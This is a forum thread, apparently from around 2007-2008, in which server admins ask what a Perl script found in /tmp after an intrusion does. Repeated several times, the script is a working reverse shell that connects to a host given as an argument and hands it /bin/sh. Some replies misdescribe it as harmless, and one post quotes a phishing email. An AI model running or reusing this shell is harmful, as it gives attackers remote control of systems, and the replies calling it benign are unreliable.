Hacking Perl Script

falco85 · #1 (**permalink**) 09-28-2007, 08:03 AM

I was looking through my log files and happened by a file upload that should not have been uploaded (through a script somehow they managed to upload although they shouldn't have access). I then immediatly went to the directory the script was inserted into "/tmp" and opened the file. The first line reads #!/usr/bin/perl and even though I have used perl before I still don't entirely understand what this script does.

Perl Code:

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

I can see that it opens lynx and connects to the local machine but what does this do:

Perl Code:

$system= 'echo "`uname -a`";echo "`id`";/bin/sh';

I understand echo and uname but is it calling /bin/sh?

From this point down I do not understand. Any of this I do not really understand what it is doing:

Perl Code:

$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

Can someone help me figure out what the intention of this script is?

KevinADC · #2 (**permalink**) 09-28-2007, 08:15 PM

hmmm.... I don't know what it is trying to do. Maybe ask on PerlMonks - The Monastery Gates if you get an answer post back here.

Lop · #3 (**permalink**) 09-30-2007, 09:40 AM

It looks like it is just loading a website. The arguments could be anything though. It doesn't look malicious.

zosorock · #4 (**permalink**) 11-10-2007, 12:19 AM

I believe it is indeed malicious. In my case I was presented with a mailqueue of 9000 emails trying to send out a phising/scam type of email (excerpt below), right after this script showed up.

I am not that good of a server admin but I am pretty sure this script started it somehow.

Excerpt of the email:
The Local Organizing Committee of the Heineken European Champions League is glad to announce to the world the giving away of the sum of TWO HUNDRED MILLION POUNDS to 100 lucky email addresses all over the world.

I hope you didn't have the same problem... it was pretty annoying to delete all those... thankfully they all came from nobody@.

ETbyrne · #5 (**permalink**) 11-10-2007, 07:27 PM

Did you ever find out what it was?

TkTech · #6 (**permalink**) 11-12-2007, 04:51 PM

It in itself is not malicious. It connects to an external server and port passed as parameters to the script and sends all of the detailed system information to that server. Then that can be used to find commmon security flaws for that os/aric

psousa · #7 (**permalink**) 10-08-2008, 08:31 AM

Quote:

Originally Posted by falco85

I was looking through my log files and happened by a file upload that should not have been uploaded (through a script somehow they managed to upload although they shouldn't have access). I then immediatly went to the directory the script was inserted into "/tmp" and opened the file. The first line reads #!/usr/bin/perl and even though I have used perl before I still don't entirely understand what this script does.

Perl Code:

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

I can see that it opens lynx and connects to the local machine but what does this do:

Perl Code:

$system= 'echo "`uname -a`";echo "`id`";/bin/sh';

I understand echo and uname but is it calling /bin/sh?

From this point down I do not understand. Any of this I do not really understand what it is doing:

Perl Code:

$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

Can someone help me figure out what the intention of this script is?

Same issue here. Do you have any news on this issue?

My details:

Hello.

Today I found a /tmp script (/tmp/back).
I have APF firewall and anti-DoS, secured tmp's and modsecurity2 on apache2 running gotroot rules.

How can it is possible to write a perl file on /tmp? File has not run permitions, but is a Perl file, so I think they ran it. I found this script after someone to send mail bomb through the server (about 9000 each time).

Server simptoms:
several connections from my server to ftp.hosteurope.de
several phishing emails being sent over my server

Script code:

Quote:

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

Email Bazilian content:

Quote:

(...) Estamos fazendo atualizações críticas em nossos servidores, por esse motivo é necessário o recadastro de seus dados cadastrais para ter acesso a todos os serviços do Internet Banking Caixa.
Para realizar a atualização, basta baixar o programa de atualização da Caixa que segue link abaixo. (...)

How can server possible be compromised?

Any help will be appreciated.

Regards.

KevinADC · #8 (**permalink**) 10-08-2008, 04:11 PM

This is a perl forum, not a server setup or server related issues forum. The fact that it is a perl script has no bearing on how your server was compromised, it could have well been a shell script, like bash or ksh. The place to ask is on a forum that discusses the particular server you use or possibly a system administrator forum.

Thread Tools	Search this Thread
Show Printable Version Email this Page	Search this Thread: Advanced Search
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode

Similar Threads
Thread	Thread Starter	Forum	Replies	Last Post
JavaScript:Tutorial, Using an External Script	TcM	Javascript	7	09-11-2007 07:39 AM
Perl is Dead. Long live Perl.	Kernel	Programming News	3	08-10-2007 10:49 AM
(Script) Copy content to clipboard, how?	annannienann	Visual Basic Programming	0	06-19-2007 05:20 PM
Packet Loss Perl Script	Jordan	Tutorials	1	04-29-2007 12:29 PM

Xav	........	1276.19
MeTh0Dz\|Reb0rn	........	1048.58
marwex89	........	869.98
John	........	868.39
morefood2001	........	868.04
WingedPanther	........	761.06
Brandon W	........	684.87
chili5	........	294.12
Steve.L	........	216.18
dargueta	........	192.86

Unregistered, Check out the Coder Battles in the Announcement and Game forums.

CodeCall

Contest Stats

CodeCall Goal

Sponsors

Ads

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)